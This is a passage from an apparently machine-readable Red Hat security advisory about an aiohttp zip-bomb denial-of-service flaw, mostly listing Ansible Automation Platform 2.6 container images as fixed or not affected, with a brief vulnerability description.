"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2427456"
}
],
"notes": [
{
"category": "description",
"text": "A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host\u0027s memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
